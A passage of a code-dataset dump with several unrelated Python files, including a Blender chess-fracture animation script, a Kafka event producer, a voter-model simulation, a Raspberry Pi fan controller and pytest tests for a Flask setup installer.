2].mean())/X[:, 2].std()\n # get the dimentions of the feature matrix\n num_of_observations, dimension=X.shape\n # convert the categorical values into 
numerical values with one-hot encoding\n # (the last column holds 4 categories -- time of day -- so it is expanded\n # into 4 indicator columns, giving dimension+3 columns in total)\n X2=np.zeros((num_of_observations, dimension+3))\n X2[:, 0:(dimension-1)]=X[:, 0:(dimension-1)]\n # apply one hot encoding for the categorical columns\n for n in range(num_of_observations):\n # get the categorical value (time of day) for each entry\n t=int(X[n, dimension-1])\n X2[n, t+dimension-1]=1\n return X2, Y\n\n# for the binary classification we will select only the classes 0 and 1\ndef get_binary_data():\n X, Y=get_data()\n X2=X[Y<=1]\n Y2=Y[Y<=1]\n return X2, Y2","sub_path":"e comm project/process.py","file_name":"process.py","file_ext":"py","file_size_in_byte":1346,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"276730339","text":"def alternatingCharacters(s):\n # Assigning the first character of the string as the initial check string\n check = s[0]\n\n # Assigning the initial check index 'j' and the initial counter\n j = 0\n counter = 0\n\n # Looping through each character of the string, excluding the first one\n # since it is already assigned to the check as our reference\n for i in range(1, len(s)):\n # Checking if the current character of the string matches the last character in the check\n if s[i] != check[j]:\n # If it differs, the character is appended to the check string and its index is incremented by 1\n check += s[i]\n j += 1\n # Otherwise the counter gets incremented by 1 since this would mean that a\n # character gets deleted in order to keep the alternation in the string\n else:\n counter += 1\n\n # Returning the number of deletions\n return counter\n\n\n# Test\nstring = 'AAABBBAABB'\n\nprint(alternatingCharacters(string))\n","sub_path":"String Manipulation/Alternating Characters/alternatingcharacters_solution.py","file_name":"alternatingcharacters_solution.py","file_ext":"py","file_size_in_byte":1001,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"617871254","text":"import grid_model\nimport random\n\nclass VoterModel(grid_model.GridModel):\n __fullname__ = 'Voter Model'\n\n def __init__(self):\n super().__init__()\n self.size = 0\n self.set_timer_speed(500)\n\n def handle_property_change(self, prop, value):\n if prop == 'size':\n self._grid(value)\n elif prop == 'probability':\n self._grid(self.size, prob=value)\n\n def _grid(self, size, prob=None):\n if size <= 0:\n raise ValueError('invalid grid size')\n self.size = size\n\n if prob is not None:\n self.prob = prob\n self.create_grid(size, size, initial_state= lambda row, col: {\n 'color': 'black' if random.random() < self.prob else 'white'\n })\n\n def create(self):\n size = 50\n speed = 0.1\n prob = 0.5\n\n self.add_property('size', 'Grid Size', size, [1, 100], 1)\n self.add_property('probability', 'Probability', prob, [0, 1], 'any')\n self.add_property('speed', 'Speed', speed, [0, 1], 'any')\n\n self._grid(size, prob=prob)\n self.set_speed(speed)\n\n def set_speed(self, speed):\n self.speed = speed\n self.set_timer_speed(1000 - speed * 1000)\n\n def reset(self):\n self._grid(self.size, prob=self.prob)\n\n def tick(self):\n # choose random agent\n row = random.randrange(0, self.size)\n col = random.randrange(0, self.size)\n\n # choose random neighbor\n all_neighs = self.get_cell_neighbors(row, col)\n neigh = random.sample(all_neighs, 1)[0]\n\n # copy state\n self.set_agent_state(row, col, self.get_agent_state(*neigh))\n\n def get_agent_state(self, 
row, col):\n return 1 if self.get_cell_attribute(row, col, 'color') == 'black' else 0\n\n def set_agent_state(self, row, col, state):\n # map the numeric state back to a color; must mirror get_agent_state (1 == 'black')\n color = None\n if state == 1:\n color = 'black'\n elif state == 0:\n color = 'white'\n if color is None:\n raise ValueError('invalid state: {0}'.format(state))\n self.notify_cell_state(row, col, color=color)\n","sub_path":"client_python/models/voter.py","file_name":"voter.py","file_ext":"py","file_size_in_byte":2171,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"1838087","text":"\nEXIT_CODES = {\n 'OK': 0,\n 'UNKNOWN': -1,\n 'CHESS_FRACTURE_TEST_FAIL': 1,\n 'SIMULATION_FAILED': 2,\n 'MISSING_DEPENDENCY': 3,\n 'PGN_LOAD_FAILED': 4,\n 'UNSUPPORTED_VARIANT': 5,\n 'SAVE_FAILED': 6,\n}\n\n\nfrom io import StringIO\n\nimport os\nfrom os import path\nimport sys\nfrom pprint import pprint\nimport time\nimport re\nimport traceback\nfrom math import pi\n\nimport bpy\nimport bmesh\nfrom mathutils.bvhtree import BVHTree\n\ntry:\n import chess.pgn\nexcept Exception as e:\n print('chess module missing (pip install python-chess?)')\n traceback.print_exc()\n sys.exit(EXIT_CODES['MISSING_DEPENDENCY'])\n\n\n# square size in blender units\nSQUARE_SIZE = 3.0\n\n# center of gravity for the pieces\nZ_MAP = {\n 'king': 2.32912,\n 'queen': 2.0401,\n 'bishop': 1.1886,\n 'knight': 1.4525,\n 'rook': 1.46252,\n 'pawn': 1.35288,\n}\n\n\ndef chess_to_coordinates(row, col, z):\n x_map = {'a': 0., 'b': 1., 'c': 2., 'd': 3., 'e': 4., 'f': 5., 'g': 6., 'h': 7.}\n y_map = {'1': 0., '2': 1., '3': 2., '4': 3., '5': 4., '6': 5., '7': 6., '8': 7.}\n \n return (x_map[row] + 0.5) * SQUARE_SIZE, (y_map[col] + 0.5) * SQUARE_SIZE, z\n\n\ndef clean():\n for action in bpy.data.actions:\n if action.users == 0:\n bpy.data.actions.remove(action)\n for mesh in bpy.data.meshes:\n if mesh.users == 0:\n bpy.data.meshes.remove(mesh)\n\n\ndef instantiate_piece(piece_name, player, board_location, z, name=None):\n col, row = board_location\n src_obj = bpy.context.scene.objects['template_' + piece_name]\n\n new_obj = src_obj.copy()\n new_obj.data = src_obj.data.copy()\n new_obj.animation_data_clear()\n\n if name:\n new_obj.name = name\n else:\n new_obj.name = piece_name + '.' + player + '.' 
+ col + row\n \n bpy.context.scene.collection.objects.link(new_obj)\n new_obj.location = chess_to_coordinates(col, row, z)\n\n if player == 'black':\n new_obj.rotation_euler[2] += pi\n\n new_obj.keyframe_insert(data_path='location')\n\n print('Instantiating ' + str(new_obj.name) + ' for ' + str(player) + ' at ' + str(new_obj.location))\n \n # physics\n bpy.data.scenes['Scene'].rigidbody_world.collection.objects.link(new_obj)\n\n return new_obj\n\n\ndef check_object_intersects(a, b):\n '''\n Checks if 2 objects meshes intersects\n https://blender.stackexchange.com/questions/71289/using-overlap-to-check-if-two-meshes-are-intersecting\n '''\n\n bmA = bmesh.new()\n bmB = bmesh.new()\n\n #fill bmesh data from objects\n bmA.from_mesh(a.data)\n bmB.from_mesh(b.data)\n #fixed it here:\n bmA.transform(a.matrix_world)\n bmB.transform(b.matrix_world)\n #make BVH tree from BMesh of objects\n bvhA = BVHTree.FromBMesh(bmA)\n bvhB = BVHTree.FromBMesh(bmB)\n #get intersecting pairs\n inter = bvhA.overlap(bvhB)\n #if list is empty, no objects are touching\n return inter\n\n\ndef initial_setup():\n # remove old meshes\n clean()\n \n # remove stuff\n bpy.ops.object.select_all(action='SELECT')\n for o in filter(lambda x: x.name.startswith('template_'), bpy.data.objects):\n o.select_set(False)\n bpy.ops.object.delete()\n\n \n bpy.context.scene.frame_set(1)\n bpy.context.scene.frame_end = 3000\n \n\n #bpy.ops.rigidbody.world_add()\n \n \n board_map = {}\n # PAWNS\n piece_name = 'pawn'\n for idx1, col in enumerate(\"abcdefgh\"):\n for idx2, row in enumerate(\"27\"):\n board_location = (col, row)\n if int(row) < 4:\n player = 'white'\n else:\n player = 'black'\n new_obj = instantiate_piece(piece_name, player, board_location, Z_MAP[piece_name])\n board_map[col + row] = new_obj\n\n # ROOKS\n piece_name = 'rook'\n for idx1, col in enumerate(\"ah\"):\n for idx2, row in enumerate(\"18\"):\n if int(row) < 4:\n player = 'white'\n else:\n player = 'black'\n board_location = (col, row)\n new_obj = instantiate_piece(piece_name, player, board_location, Z_MAP[piece_name])\n board_map[col + row] = new_obj\n # KNIGHTS\n piece_name = 'knight'\n for idx1, col in enumerate(\"bg\"):\n for idx2, row in enumerate(\"18\"):\n if int(row) < 4:\n player = 'white'\n else:\n player = 'black'\n board_location = (col, row)\n new_obj = instantiate_piece(piece_name, player, board_location, Z_MAP[piece_name])\n board_map[col + row] = new_obj\n # BISHOPS\n piece_name = 'bishop'\n for idx1, col in enumerate(\"cf\"):\n for idx2, row in enumerate(\"18\"):\n if int(row) < 4:\n player = 'white'\n else:\n player = 'black'\n board_location = (col, row)\n new_obj = instantiate_piece(piece_name, player, board_location, Z_MAP[piece_name])\n board_map[col + row] = new_obj\n # QUEENS\n piece_name = 'queen'\n for idx1, col in enumerate(\"d\"):\n for idx2, row in enumerate(\"18\"):\n if int(row) < 4:\n player = 'white'\n else:\n player = 'black'\n board_location = (col, row)\n new_obj = instantiate_piece(piece_name, player, board_location, Z_MAP[piece_name])\n board_map[col + row] = new_obj\n # KINGS\n piece_name = 'king'\n for idx1, col in enumerate(\"e\"):\n for idx2, row in enumerate(\"18\"):\n if int(row) < 4:\n player = 'white'\n else:\n player = 'black'\n board_location = (col, row)\n new_obj = instantiate_piece(piece_name, player, board_location, Z_MAP[piece_name])\n board_map[col + row] = new_obj\n \n # BOARD \n bpy.ops.mesh.primitive_plane_add(enter_editmode=False, location=(0, 0, 0))\n bpy.context.selected_objects[0].name = 'ground'\n \n 
bpy.context.object.scale[1] = 4 * SQUARE_SIZE\n bpy.context.object.scale[0] = 4 * SQUARE_SIZE\n bpy.context.object.location[0] = 4 * SQUARE_SIZE\n bpy.context.object.location[1] = 4 * SQUARE_SIZE\n\n bpy.data.scenes['Scene'].rigidbody_world.collection.objects.link(bpy.data.objects['ground'])\n\n # TODO: create checker texture\n checker_mat = bpy.data.materials.get('checker')\n bpy.data.objects['ground'].data.materials.append(checker_mat)\n\n bpy.context.scene.frame_set(2)\n bpy.context.scene.frame_set(3)\n bpy.context.scene.frame_set(1)\n \n bpy.data.objects['ground'].rigid_body.kinematic = True\n for piece in board_map.values():\n piece.rigid_body.kinematic = True\n\n\n return board_map\n \n\n\ndef load_pgn(pgn_path):\n print(\"Loading PGN \" + str(pgn_path))\n try:\n with open(pgn_path) as pgn_file:\n game = chess.pgn.read_game(pgn_file)\n except Exception as e:\n print(\"Load PGN failed\")\n traceback.print_exc()\n sys.exit(EXIT_CODES['PGN_LOAD_FAILED'])\n \n return game\n \n\ndef fracture(obj, n_fragments, current_frame):\n bpy.ops.object.select_all(action='DESELECT')\n obj.select_set(True)\n bpy.ops.object.add_fracture_cell_objects(source_limit=n_fragments)\n \n for o in filter(lambda x: x.name.startswith(obj.name + '_cell'), bpy.data.objects):\n bpy.data.scenes['Scene'].rigidbody_world.collection.objects.link(o)\n\n bpy.context.scene.frame_set(1)\n bpy.context.scene.frame_set(2)\n bpy.context.scene.frame_set(current_frame)\n \n for o in filter(lambda x: x.name.startswith(obj.name + '_cell'), bpy.data.objects):\n print('enable rigid_body.kinematic for ' + str(o))\n o.rigid_body.kinematic = True\n o.keyframe_insert('rigid_body.kinematic')\n\n # disable old piece\n for o in bpy.data.objects:\n o.select_set(False)\n obj.select_set(True)\n\n # needed or obj.rigid_body is None\n bpy.context.scene.frame_set(0)\n bpy.context.scene.frame_set(1)\n bpy.context.scene.frame_set(2)\n bpy.context.scene.frame_set(0)\n\n obj.rigid_body.collision_collections[0] = True\n obj.keyframe_insert('rigid_body.collision_collections')\n obj.hide_viewport = False\n obj.keyframe_insert('hide_viewport')\n obj.hide_render = False\n obj.keyframe_insert('hide_render')\n \n bpy.context.scene.frame_set(current_frame - 1)\n obj.rigid_body.collision_collections[0] = False\n obj.keyframe_insert('rigid_body.collision_collections')\n obj.hide_viewport = True\n obj.keyframe_insert('hide_viewport')\n obj.hide_render = True\n obj.keyframe_insert('hide_render')\n \n # enable rigid body for cells\n bpy.context.scene.frame_set(current_frame - 1)\n for o in filter(lambda x: x.name.startswith(obj.name + '_cell'), bpy.data.objects):\n o.rigid_body.kinematic = True\n o.keyframe_insert('rigid_body.kinematic')\n o.rigid_body.collision_collections[0] = False\n o.keyframe_insert('rigid_body.collision_collections')\n bpy.context.scene.frame_set(current_frame)\n for o in filter(lambda x: x.name.startswith(obj.name + '_cell'), bpy.data.objects):\n o.rigid_body.kinematic = False\n o.keyframe_insert('rigid_body.kinematic')\n o.rigid_body.collision_collections[0] = True\n o.keyframe_insert('rigid_body.collision_collections')\n \n # hide/unhide\n bpy.context.scene.frame_set(0)\n for o in filter(lambda x: x.name.startswith(obj.name + '_cell'), bpy.data.objects):\n o.hide_viewport = True\n o.keyframe_insert('hide_viewport')\n o.hide_render = True\n o.keyframe_insert('hide_render')\n bpy.context.scene.frame_set(current_frame - 1)\n for o in filter(lambda x: x.name.startswith(obj.name + '_cell'), bpy.data.objects):\n o.hide_viewport = False\n 
o.keyframe_insert('hide_viewport')\n o.hide_render = False\n o.keyframe_insert('hide_render')\n\n\ndef play(board_map, game, frames_per_move, n_fragments):\n start_time = time.time()\n\n board = game.board()\n for move_number, move in enumerate(game.mainline_moves()):\n from_square = move.uci()[0:2]\n to_square = move.uci()[2:4]\n \n is_capture = board.is_capture(move)\n is_castling = board.is_castling(move)\n is_kingside_castling = board.is_kingside_castling(move)\n is_queenside_castling = board.is_queenside_castling(move)\n is_en_passant = board.is_en_passant(move)\n promotion = move.promotion\n \n print('{}: {}, cap: {}, castl: {}, promot: {}'.format((move_number // 2) + 1, move, is_capture, is_castling, promotion))\n\n\n if is_castling:\n king = board_map[from_square]\n \n if to_square == 'g1':\n rook_from = 'h1'\n rook_dest = 'f1'\n elif to_square == 'c1':\n rook_from = 'a1'\n rook_dest = 'd1'\n elif to_square == 'g8':\n rook_from = 'h8'\n rook_dest = 'f8'\n elif to_square == 'c8':\n rook_from = 'a8'\n rook_dest = 'd8'\n rook = board_map[rook_from]\n \n # insert keyframes\n king.keyframe_insert(data_path='location')\n rook.keyframe_insert(data_path='location')\n \n bpy.context.scene.frame_set(bpy.context.scene.frame_current + frames_per_move)\n \n # move king\n king.location = chess_to_coordinates(to_square[0], to_square[1], king.location.z)\n king.keyframe_insert(data_path='location')\n \n # move rook\n rook.location = chess_to_coordinates(rook_dest[0], rook_dest[1], rook.location.z)\n rook.keyframe_insert(data_path='location')\n \n # update board\n board_map.pop(from_square)\n board_map.pop(rook_from)\n \n board_map[to_square] = king\n board_map[rook_dest] = rook\n \n # end if castling\n elif is_capture:\n # keyframe for previous position\n board_map[from_square].keyframe_insert(data_path='location')\n board_map[to_square].keyframe_insert('rigid_body.kinematic')\n \n # WTF was that?\n #bpy.context.scene.frame_set(bpy.context.scene.frame_current + 1)\n #board_map[to_square].rigid_body.kinematic = False\n #board_map[to_square].keyframe_insert('rigid_body.kinematic')\n #bpy.context.scene.frame_set(bpy.context.scene.frame_current - 1)\n \n current_frame = bpy.context.scene.frame_current\n \n # timestep\n bpy.context.scene.frame_set(current_frame + frames_per_move)\n # move piece\n board_map[from_square].location = chess_to_coordinates(to_square[0], to_square[1], board_map[from_square].location.z)\n board_map[from_square].keyframe_insert(data_path='location')\n \n # change interpolation method (need to be done before computing the collision instant)\n piece_re = re.compile(r'.*[a-h]\\d$')\n for o in bpy.data.objects:\n if piece_re.match(o.name) and hasattr(o.animation_data, 'action'):\n fcurves = o.animation_data.action.fcurves\n\n print('curve: ' + str(o.name))\n for fcurve in fcurves:\n for kf in fcurve.keyframe_points:\n kf.interpolation = 'SINE'\n\n # find collison frame\n print('Looking for collision...')\n collision_frame = 0\n for i in range(frames_per_move):\n bpy.context.scene.frame_set(current_frame + i)\n flag = check_object_intersects(board_map[from_square], board_map[to_square])\n print('i={}: {}'.format(i, len(flag)))\n if flag:\n print('Collision on frame {}'.format(bpy.context.scene.frame_current))\n collision_frame = bpy.context.scene.frame_current\n break\n\n fracture(board_map[to_square], n_fragments, collision_frame)\n \n \n # play the move on the board_map\n board_map[to_square] = board_map[from_square]\n board_map.pop(from_square)\n\n # end if capture\n else:\n # 
simple move\n # keyframe for previous position\n board_map[from_square].keyframe_insert(data_path='location')\n \n # timestep\n bpy.context.scene.frame_set(bpy.context.scene.frame_current + frames_per_move)\n \n # move piece\n board_map[from_square].location = chess_to_coordinates(to_square[0], to_square[1], board_map[from_square].location.z)\n board_map[from_square].keyframe_insert(data_path='location')\n \n # play the move on board\n board_map[to_square] = board_map[from_square]\n board_map.pop(from_square)\n\n # end simple move\n\n if promotion:\n TURN_COLOR_MAP = { True: 'white', False: 'black' }\n player = TURN_COLOR_MAP[board.turn]\n\n promoted_piece_name = chess.PIECE_NAMES[promotion]\n print('Promoted to: ' + str(promoted_piece_name))\n\n (col, row) = (to_square[0], to_square[1])\n z = Z_MAP[promoted_piece_name] - 10.\n promoted_piece = instantiate_piece(promoted_piece_name, player, (col, row), z, name='{}.{}.promoted.{}{}'.format(promoted_piece_name, player, col, row))\n\n print('promoted piece = ' + str(promoted_piece_name) + ', at ' + str((col, row)))\n pawn = board_map[col + row]\n print('promotion pawn = ' + str(pawn))\n \n # disable physics and display for promoted piece from #0 to #current_frame\n current_frame = bpy.context.scene.frame_current\n\n # otherwise promoted_piece.rigid_body == None\n bpy.context.scene.frame_set(2)\n bpy.context.scene.frame_set(3)\n bpy.context.scene.frame_set(1)\n bpy.context.scene.frame_set(current_frame - 1)\n\n promoted_piece.rigid_body.kinematic = True\n promoted_piece.keyframe_insert('rigid_body.kinematic')\n promoted_piece.rigid_body.collision_collections[0] = True\n promoted_piece.keyframe_insert('rigid_body.collision_collections')\n promoted_piece.hide_viewport = True\n promoted_piece.keyframe_insert('hide_viewport')\n promoted_piece.hide_render = True\n promoted_piece.keyframe_insert('hide_render')\n \n # promoted piece appears on #current_frame\n bpy.context.scene.frame_set(current_frame)\n promoted_piece.rigid_body.collision_collections[0] = True\n promoted_piece.keyframe_insert('rigid_body.collision_collections')\n promoted_piece.hide_viewport = False\n promoted_piece.keyframe_insert('hide_viewport')\n promoted_piece.hide_render = False\n promoted_piece.keyframe_insert('hide_render')\n\n # distroy pawn\n fracture(pawn, n_fragments, current_frame)\n\n # animate promoted piece?\n current_frame += frames_per_move\n bpy.context.scene.frame_set(current_frame)\n promoted_piece.location[2] += 10.\n promoted_piece.keyframe_insert(data_path='location')\n\n # update board_map\n board_map[to_square] = promoted_piece\n\n # update the board\n board.push(move)\n \n if 'CHESS_FRACTURE_TEST' in os.environ and move_number > 10:\n print('Early exit because CHESS_FRACTURE_TEST is defined')\n break\n # end for moves\n \n # assign materials\n white_mat = bpy.data.materials.get('white')\n black_mat = bpy.data.materials.get('black')\n \n whites_re = re.compile(r'.*white.*')\n blacks_re = re.compile(r'.*black.*')\n for obj in bpy.data.objects:\n if whites_re.match(obj.name):\n obj.data.materials.append(white_mat)\n elif blacks_re.match(obj.name):\n obj.data.materials.append(black_mat)\n\n # interpolation method\n piece_re = re.compile(r'.*[a-h]\\d$')\n for o in bpy.data.objects:\n if piece_re.match(o.name) and hasattr(o.animation_data, 'action'):\n fcurves = o.animation_data.action.fcurves\n\n print('curve: ' + str(o.name))\n for fcurve in fcurves:\n for kf in fcurve.keyframe_points:\n kf.interpolation = 'SINE'\n\n # compute some stats\n end_time = 
time.time()\n duration = end_time - start_time\n print()\n print('Duration: ' + str(duration))\n # end def play\n\n\ndef get_env_or_default(name, default):\n if name in os.environ:\n return os.environ[name]\n else:\n return default\n\n\ndef main():\n if 'CHESS_FRACTURE_TEST_FAIL' in os.environ:\n print('CHESS_FRACTURE_TEST_FAIL')\n sys.exit(EXIT_CODES['CHESS_FRACTURE_TEST_FAIL'])\n\n frames_per_move = int(get_env_or_default('CHESS_FRACTURE_FRAMES_PER_MOVE', 20))\n print(\"CHESS_FRACTURE_FRAMES_PER_MOVE=\" + str(frames_per_move))\n\n n_fragments = int(get_env_or_default('CHESS_FRACTURE_FRAGMENTS', 10))\n print(\"CHESS_FRACTURE_FRAGMENTS=\" + str(n_fragments))\n\n pgn_path = get_env_or_default('CHESS_FRACTURE_PGN_PATH', '/work/input.pgn')\n game = load_pgn(pgn_path)\n\n variant = game.board().uci_variant\n if variant != 'chess' or game.board().chess960:\n sys.stdout.write('Unsupported game type {}\\n'.format(variant))\n sys.exit(EXIT_CODES['UNSUPPORTED_VARIANT'])\n\n board_map = initial_setup()\n print('Board setup done')\n\n try:\n play(board_map, game, frames_per_move, n_fragments)\n print('Simulation done')\n except Exception as e:\n print('Simulation failed')\n traceback.print_exc()\n sys.exit(EXIT_CODES['SIMULATION_FAILED'])\n\n try:\n if 'CHESS_FRACTURE_OUT_BLEND' in os.environ:\n save_file = os.environ['CHESS_FRACTURE_OUT_BLEND']\n \n bpy.ops.wm.save_as_mainfile(filepath=save_file)\n \n print('File saved as \"{}\"'.format(save_file))\n \n sys.exit(EXIT_CODES['OK']) # happy path\n except Exception as e:\n print('Save failed ' + str(e))\n traceback.print_exc()\n sys.exit(EXIT_CODES['SAVE_FAILED'])\n # end def main\n\n\nif __name__ == '__main__':\n try:\n main()\n except Exception as e:\n print('main failed :' + str(e))\n traceback.print_exc()\n sys.exit(EXIT_CODES['UNKNOWN'])\n","sub_path":"blender/chess_fracture_2.80.py","file_name":"chess_fracture_2.80.py","file_ext":"py","file_size_in_byte":20634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"274969382","text":"from decimal import Decimal as dec, getcontext\n\ndef leibniz(limit, prec):\n\tgetcontext().prec = prec\n\n\tlimit += 1\n\tnumerator = dec(4)\n\tpi = dec(0)\n\n\tfor n in range(1, limit, 2):\n\t\tpi += numerator / n\n\t\tnumerator = -numerator\n\n\treturn dec(pi)\n\nif __name__ == '__main__':\n\tpi = leibniz(200, 200)\n\n\twith open('leibniz_pi.txt', 'w') as f:\n\t f.write(str(pi))\n","sub_path":"other/calculate_pi/leibniz.py","file_name":"leibniz.py","file_ext":"py","file_size_in_byte":356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"49106601","text":"import abc\nimport asyncio\nimport logging\nfrom typing import Optional\n\nfrom aiokafka import AIOKafkaProducer\n\nfrom settings import settings\n\n\nclass AbstractEventStorage(abc.ABC):\n @abc.abstractmethod\n def send(self, *args, **kwargs):\n pass\n\n\nlogger = logging.getLogger(__name__)\n\n\nclass KafkaEventStorage(AbstractEventStorage):\n def __init__(self, producer: AIOKafkaProducer):\n self.producer = producer\n\n async def send(self, topic: str, value: str, key: str, *args, **kwargs):\n try:\n print(f'Sending {topic}, {value}, {key}')\n await self.producer.send_and_wait(topic=topic, value=value, key=key)\n except Exception as e:\n logger.exception(e)\n\n\nevent_storage: Optional[AbstractEventStorage] = None\n\n\nasync def get_event_storage() -> AbstractEventStorage:\n global event_storage\n if not event_storage:\n loop = asyncio.get_event_loop()\n # Set 
max_batch_size and linger_ms to manage batch sending\n kafka_producer = AIOKafkaProducer(loop=loop,\n bootstrap_servers=settings.kafka_bootstrap_servers)\n await kafka_producer.start()\n event_storage = KafkaEventStorage(producer=kafka_producer)\n return event_storage\n","sub_path":"kafka-api/src/db/events_storage.py","file_name":"events_storage.py","file_ext":"py","file_size_in_byte":1260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"617112710","text":"import RPi.GPIO as GPIO\nimport time\n\nFAN_1 = 22\nFAN_2 = 27\n\nGPIO.setmode(GPIO.BCM)\nGPIO.setwarnings(False)\nGPIO.setup(FAN_1, GPIO.OUT)\nGPIO.setup(FAN_2, GPIO.OUT)\n\ndef action(command):\n if command == \"true\":\n print(\"true\")\n runFan()\n elif command == \"false\":\n print(\"false\")\n stopFan()\n \n\ndef runFan():\n\n GPIO.output(FAN_1, GPIO.HIGH)\n GPIO.output(FAN_2, GPIO.LOW)\n\ndef stopFan():\n\n GPIO.output(FAN_1, GPIO.LOW)\n GPIO.output(FAN_2, GPIO.LOW)\n\n","sub_path":"main/python/Fan.py","file_name":"Fan.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"587663294","text":"import os\nimport pytest\nimport bcrypt\nfrom configparser import ConfigParser\nfrom flask import Flask\nfrom peewee import SqliteDatabase\n\nfrom sebureem.setup_app import setup_app\nfrom sebureem.models import Sebura, Sebuks\n\n@pytest.fixture(scope='module')\ndef setup_app_fix():\n app = Flask(__name__)\n app.secret_key = \"Sebureem test secret_key\"\n app.register_blueprint(setup_app)\n yield app.test_client()\n\n@pytest.fixture()\ndef setup_config_dir(tmpdir):\n if os.name == \"posix\":\n os.environ['XDG_CONFIG_HOME'] = str(tmpdir)\n elif os.name == \"nt\":\n os.environ['LOCALAPPDATA'] = str(tmpdir)\n yield tmpdir.join('sebureem')\n\n@pytest.fixture()\ndef create_config_file(setup_config_dir):\n config_file = setup_config_dir.join('sebureem.ini')\n config_file.write(\"# Sebureem config file\", ensure=True)\n yield config_file\n\n@pytest.fixture()\ndef create_db(setup_config_dir):\n db_file = setup_config_dir.join('sebureem_test.db')\n print(db_file)\n db = SqliteDatabase(str(db_file))\n db.connect()\n db.create_tables([Sebura, Sebuks], safe=True)\n db.close()\n yield db_file\n\nclass TestSetupApp:\n\n def test_app_running(self, setup_app_fix):\n ret = setup_app_fix.get(\"/install/\")\n assert b\"Sebureem installer\" in ret.data\n\n def test_set_config_file(self, setup_app_fix, setup_config_dir):\n config_file = setup_config_dir.join('sebureem.ini')\n ret = setup_app_fix.get(\"install/config/\")\n assert b\"Config file created\" in ret.data\n assert \"# Sebureem config file\" in config_file.read()\n\n def test_create_config_file_exists(self, setup_app_fix, create_config_file):\n config_file = create_config_file\n assert \"# Sebureem config file\" in config_file.read()\n ret = setup_app_fix.get(\"install/config/\")\n assert b\"Warning: Config file found\" in ret.data\n\n def test_create_config_dir_exists(self, setup_app_fix, setup_config_dir):\n config_dir = setup_config_dir\n config_dir.mkdir()\n ret = setup_app_fix.get(\"install/config/\")\n config_file = setup_config_dir.join('sebureem.ini')\n assert b\"Config file created\" in ret.data\n assert \"# Sebureem config file\" in config_file.read()\n\n def test_set_db_path(self, setup_app_fix, tmpdir):\n ret = setup_app_fix.get(\"install/database/\")\n assert b\"Creating database\" in ret.data\n\n def test_create_db(self, setup_app_fix, 
create_config_file, tmpdir):\n conf_path = create_config_file\n test_conf = ConfigParser(allow_no_value=True)\n db_path = tmpdir.join('sebureem')\n ret = setup_app_fix.post('/install/database/', data={\n 'db_path' : str(db_path),\n 'db_name': 'sebureem_test.db'\n })\n test_conf.read_file(conf_path.readlines())\n assert test_conf['DATABASE']['path'] == str(\n db_path.join('sebureem_test.db')\n )\n assert db_path.join('sebureem_test.db').check(file=True)\n assert b\"Database created\" in ret.data\n\n def test_create_db_exists(self, setup_app_fix, create_config_file, create_db, tmpdir):\n conf_path = create_config_file\n db_path = create_db\n print(str(db_path))\n test_conf = ConfigParser(allow_no_value=True)\n\n ret = setup_app_fix.post('/install/database/', data={\n 'db_path' : str(db_path),\n 'db_name': 'sebureem_test.db'\n })\n test_conf.read_file(conf_path.readlines())\n assert test_conf['DATABASE']['path'] == str(\n db_path.join('sebureem_test.db')\n )\n assert db_path.check(file=True)\n assert b\"Database already present at this location\" in ret.data\n\n def test_set_admin(self, setup_app_fix):\n ret = setup_app_fix.get(\"install/admin/\")\n assert b\"Admin account creation\" in ret.data\n\n def test_create_admin(self, setup_app_fix, create_config_file):\n conf_path = create_config_file\n test_conf = ConfigParser(allow_no_value=True)\n ret = setup_app_fix.post('/install/admin/', data={\n 'admin_login' : 'admin',\n 'admin_passwd': 'admin'\n })\n test_conf.read_file(conf_path.readlines())\n assert test_conf['ADMIN']['login'] == 'admin'\n assert bcrypt.checkpw(b'admin', bytes(test_conf['ADMIN']['passwd'], 'utf-8')) \n assert b\"Admin account created\" in ret.data\n\n def test_set_site(self, setup_app_fix):\n ret = setup_app_fix.get(\"install/site/\")\n assert b\"Creating site\" in ret.data\n\n def test_create_site(self, setup_app_fix, create_config_file):\n conf_path = create_config_file\n test_conf = ConfigParser(allow_no_value=True)\n ret = setup_app_fix.post('/install/site/', data={\n 'site_name' : 'foo',\n 'site_url': 'https://exemple.com'\n })\n test_conf.read_file(conf_path.readlines())\n assert test_conf['foo']['url'] == 'https://exemple.com'\n assert b\"Site configured\" in ret.data\n","sub_path":"tests/test_setup_app.py","file_name":"test_setup_app.py","file_ext":"py","file_size_in_byte":4991,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"150216250","text":"###############################################################\n# Author: Morgan Frisby\n# User: \tAngela Kang\n# Purpose: Assist in the blinding process of OJ applications\n# Date: \tFebruary 17, 2019\n###############################################################\n\n\nimport os\nimport sys\nfrom shutil import copyfile\nfrom operator import itemgetter\nimport csv\n\n\"\"\"\nORIGINAL_DIR - the name of the downloaded folder that has the original application files.\nBLINDED_DIR - the name of the folder that will have the blinded application files.\n\"\"\"\nORIGINAL_DIR = \"test_files\" # <-- change this!\nBLINDED_DIR = \"testing\" # <------ change this!\n\n\ndef create_folder(folder_name):\n \"\"\" Creates a new folder in the current working directory. 
